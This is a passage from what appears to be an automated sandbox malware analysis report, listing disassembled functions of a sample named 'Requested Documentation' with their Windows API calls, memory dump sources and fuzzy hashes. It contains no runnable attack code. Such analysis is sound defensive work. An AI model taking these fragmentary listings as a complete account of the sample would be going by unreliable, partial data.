                                                                              • Instruction Fuzzy Hash: BD31ED7190110DBFEB25DF94EC89EFFB7BCEF08310F400169E551A2191EB759E869AA0
                                                                              Function 00A062CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A062EC
                                                                              • GetWindowLongW.USER32(01356108,000000F0), ref: 00A0631F
                                                                              • GetWindowLongW.USER32(01356108,000000F0), ref: 00A06354
                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A06386
                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A063B0
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A063C1
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A063DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 2178440468-0
                                                                              • Opcode ID: 070e3945c23a9b7b6b24e10724b09854a6e94b2e13cc41fba2a3d27650c1bf49
                                                                              • Instruction ID: cf20a900cefd99361b4026b556b774ef25e3acc416a091c04a14380c017e9311
                                                                              • Opcode Fuzzy Hash: 070e3945c23a9b7b6b24e10724b09854a6e94b2e13cc41fba2a3d27650c1bf49
                                                                              • Instruction Fuzzy Hash: BA310734A442589FDB20CFA8EC84F5537E1FB5A718F194164F5019F2F2CB72A852DB92
                                                                              Function 009DDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDB2E
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDB54
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 009DDB57
                                                                              • SysAllocString.OLEAUT32(?), ref: 009DDB75
                                                                              • SysFreeString.OLEAUT32(?), ref: 009DDB7E
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 009DDBA3
                                                                              • SysAllocString.OLEAUT32(?), ref: 009DDBB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 0729d667863db290555009a7affeabb75e199608a3bbce8c88b87f6882ffce71
                                                                              • Instruction ID: 5897edddfc43ae306c8f879987588604006356d08bbe97286672a3b2d6d06fcc
                                                                              • Opcode Fuzzy Hash: 0729d667863db290555009a7affeabb75e199608a3bbce8c88b87f6882ffce71
                                                                              • Instruction Fuzzy Hash: 4D218136601219AFDF10DFA8DC88CBB73ACEB09364B018537FD14DB290D6749C4287A0
                                                                              Function 009F6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009F7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F7DB6
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009F61C6
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F61D5
                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F620E
                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 009F6217
                                                                              • WSAGetLastError.WSOCK32 ref: 009F6221
                                                                              • closesocket.WSOCK32(00000000), ref: 009F624A
                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F6263
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 910771015-0
                                                                              • Opcode ID: 9be08985e4a3a11df3e9ee00575e3b67e7cdbab538691b666526889521ddad66
                                                                              • Instruction ID: 87377021ee28b01497e91d0670b7876c3efffa71e94300e3af650b206b41c852
                                                                              • Opcode Fuzzy Hash: 9be08985e4a3a11df3e9ee00575e3b67e7cdbab538691b666526889521ddad66
                                                                              • Instruction Fuzzy Hash: 5831A13160020CAFDF10EF64CC85BBE77ACEB45724F048029FA15E7291CB74AC059BA1
                                                                              Function 009DF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: 3bd3d917dc2389bf7ea1ead79bd96896c7ac731ca9df00bac9e900933e32b221
                                                                              • Instruction ID: e3b6ef659b89a900b8e066979041f100c55a80e74f296222abe2c4ca89a194ee
                                                                              • Opcode Fuzzy Hash: 3bd3d917dc2389bf7ea1ead79bd96896c7ac731ca9df00bac9e900933e32b221
                                                                              • Instruction Fuzzy Hash: 9321797228411167D620AA34AC23FE7739CEF96344F50C83BF8478A291EB54DD81C3D4
                                                                              Function 009DDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDC09
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDC2F
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 009DDC32
                                                                              • SysAllocString.OLEAUT32 ref: 009DDC53
                                                                              • SysFreeString.OLEAUT32 ref: 009DDC5C
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 009DDC76
                                                                              • SysAllocString.OLEAUT32(?), ref: 009DDC84
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 27baecc7069053fee807fda4d933a5c50034a53a5b74555a7a0cfb6271344bb3
                                                                              • Instruction ID: 72691c287c37fa034901e12bf51b383ef637d236d62b3b84ac57941ae597133e
                                                                              • Opcode Fuzzy Hash: 27baecc7069053fee807fda4d933a5c50034a53a5b74555a7a0cfb6271344bb3
                                                                              • Instruction Fuzzy Hash: 67216235645208AFDB20DFF8DC88DAB77ACEB49360B10C126F954DB260D674DD42C764
                                                                              Function 00A075CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                                                                                • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                                                                                • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A07632
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A0763F
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A0764A
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A07659
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A07665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              • Opcode ID: adcf505e972d1000f6462b90f2935f6eceb70d5c27c0bf025ea918ecc4a268ff
                                                                              • Instruction ID: 8998da0dee7c79696441fa9b8fda10c45e00afe81cd0555f4801d5678575a377
                                                                              • Opcode Fuzzy Hash: adcf505e972d1000f6462b90f2935f6eceb70d5c27c0bf025ea918ecc4a268ff
                                                                              • Instruction Fuzzy Hash: B611B6B151011DBFEF119F64DC85EEB7F6DEF08798F014114BA05A2090C772AC22DBA4
                                                                              Function 009A9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __init_pointers.LIBCMT ref: 009A9AE6
                                                                                • Part of subcall function 009A3187: EncodePointer.KERNEL32(00000000), ref: 009A318A
                                                                                • Part of subcall function 009A3187: __initp_misc_winsig.LIBCMT ref: 009A31A5
                                                                                • Part of subcall function 009A3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009A9EA0
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A9EB4
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A9EC7
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A9EDA
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A9EED
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A9F00
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009A9F13
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A9F26
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A9F39
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A9F4C
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A9F5F
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A9F72
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A9F85
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A9F98
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A9FAB
                                                                                • Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A9FBE
                                                                              • __mtinitlocks.LIBCMT ref: 009A9AEB
                                                                              • __mtterm.LIBCMT ref: 009A9AF4
                                                                                • Part of subcall function 009A9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009A9AF9,009A7CD0,00A3A0B8,00000014), ref: 009A9C56
                                                                                • Part of subcall function 009A9B5C: _free.LIBCMT ref: 009A9C5D
                                                                                • Part of subcall function 009A9B5C: DeleteCriticalSection.KERNEL32(00A3EC00,?,?,009A9AF9,009A7CD0,00A3A0B8,00000014), ref: 009A9C7F
                                                                              • __calloc_crt.LIBCMT ref: 009A9B19
                                                                              • __initptd.LIBCMT ref: 009A9B3B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009A9B42
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                              • String ID:
                                                                              • API String ID: 3567560977-0
                                                                              • Opcode ID: 4e68ab628719ef99ea974f14f55b273d11822f3ea8b42eaee06f3f58d3f99d74
                                                                              • Instruction ID: 41112344e06cd1644b03d20f486d60084fe01b4f4ee607b3c3f5e4ec349d7002
                                                                              • Opcode Fuzzy Hash: 4e68ab628719ef99ea974f14f55b273d11822f3ea8b42eaee06f3f58d3f99d74
                                                                              • Instruction Fuzzy Hash: CDF090325097115AE734B7B8BC0374B3694FF83734F214A1AF461D90D2EF20844245E0
                                                                              Function 009A406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A3F85), ref: 009A4085
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 009A408C
                                                                              • EncodePointer.KERNEL32(00000000), ref: 009A4097
                                                                              • DecodePointer.KERNEL32(009A3F85), ref: 009A40B2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 3489934621-2819208100
                                                                              • Opcode ID: 450b80197adc2a70d8e0d02f5f6dd2c65563afc0c92ad75cdf772da7cbef1ca5
                                                                              • Instruction ID: dd391f3791804ac7820e8efde6342e51222025ef4cae1e56fa2d1274149cd1d2
                                                                              • Opcode Fuzzy Hash: 450b80197adc2a70d8e0d02f5f6dd2c65563afc0c92ad75cdf772da7cbef1ca5
                                                                              • Instruction Fuzzy Hash: 6EE09279581304EFEF60EFE5EC0EB453AA8BB86742F104625F511E54A0CBB786439B15
                                                                              Function 009E64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 3253778849-0
                                                                              • Opcode ID: 5a0511546f6356c8d5db77ac67a7c16c4155dfc06aa98caf02874be13bd27149
                                                                              • Instruction ID: 334f35936cecfd99a4354da40a78f76eb06ec5c358e6cdf4aa38a44516ed230f
                                                                              • Opcode Fuzzy Hash: 5a0511546f6356c8d5db77ac67a7c16c4155dfc06aa98caf02874be13bd27149
                                                                              • Instruction Fuzzy Hash: 09619B3050028A9BCF02FF65CC82BFE37A9AF95708F084919F8595B292DB35ED05DB90
                                                                              Function 00A001E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A002BD
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A002FD
                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A00320
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A00349
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A0038C
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A00399
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                              • String ID:
                                                                              • API String ID: 4046560759-0
                                                                              • Opcode ID: e07de4ffd4859caa4594926308e72875f7cdbd8a039e61786ed825e67e7f257c
                                                                              • Instruction ID: 31e4c981b4e606ee9abbe6adf901d26c19ff87e9e300d2c04a4183562e99e634
                                                                              • Opcode Fuzzy Hash: e07de4ffd4859caa4594926308e72875f7cdbd8a039e61786ed825e67e7f257c
                                                                              • Instruction Fuzzy Hash: E6515931108204AFCB15EF64D885EAFBBE9FF89314F04491DF5559B2A2DB31E905CB52
                                                                              Function 00A05799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 00A057FB
                                                                              • GetMenuItemCount.USER32(00000000), ref: 00A05832
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A0585A
                                                                              • GetMenuItemID.USER32(?,?), ref: 00A058C9
                                                                              • GetSubMenu.USER32(?,?), ref: 00A058D7
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00A05928
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                              • String ID:
                                                                              • API String ID: 650687236-0
                                                                              • Opcode ID: 5c0245829db4d57501f24595f542b71644f7280a76d69e0f5bbd662422b18392
                                                                              • Instruction ID: 69f10fc16fc0d05abd162beaa7c92275161aa10f96802d52102338ccf695349a
                                                                              • Opcode Fuzzy Hash: 5c0245829db4d57501f24595f542b71644f7280a76d69e0f5bbd662422b18392
                                                                              • Instruction Fuzzy Hash: 97513B35E00619AFCF15EFA4D845AAEB7B5EF88310F148069EC15BB391CB71AE419F90
                                                                              Function 009DEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 009DEF06
                                                                              • VariantClear.OLEAUT32(00000013), ref: 009DEF78
                                                                              • VariantClear.OLEAUT32(00000000), ref: 009DEFD3
                                                                              • _memmove.LIBCMT ref: 009DEFFD
                                                                              • VariantClear.OLEAUT32(?), ref: 009DF04A
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009DF078
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                              • String ID:
                                                                              • API String ID: 1101466143-0
                                                                              • Opcode ID: caad373349fd783ef39006f38c7d8e9b2b4be186c955f2d47da9615913f32b85
                                                                              • Instruction ID: 2eacd3068ac8b51f068a14c2d626f13cca97ddb5af75f70ff6e49be0c3c4d7cf
                                                                              • Opcode Fuzzy Hash: caad373349fd783ef39006f38c7d8e9b2b4be186c955f2d47da9615913f32b85
                                                                              • Instruction Fuzzy Hash: 73515AB5A00209EFDB14DF58C894AAAB7B8FF4C314B15856AED59DB301E335E911CFA0
                                                                              Function 009E220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2258
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E22A3
                                                                              • IsMenu.USER32(00000000), ref: 009E22C3
                                                                              • CreatePopupMenu.USER32 ref: 009E22F7
                                                                              • GetMenuItemCount.USER32(000000FF), ref: 009E2355
                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009E2386
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID:
                                                                              • API String ID: 3311875123-0
                                                                              • Opcode ID: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
                                                                              • Instruction ID: eab89f3838325bd60c1b9ef09d2b2386f02c807f8b5adfbd4328058201a89ae7
                                                                              • Opcode Fuzzy Hash: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
                                                                              • Instruction Fuzzy Hash: 2F51CF7060028ADFCF22CF6AC888BAEBBFDAF45714F104529E815A7291E3799D05CF51
                                                                              Function 00981765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
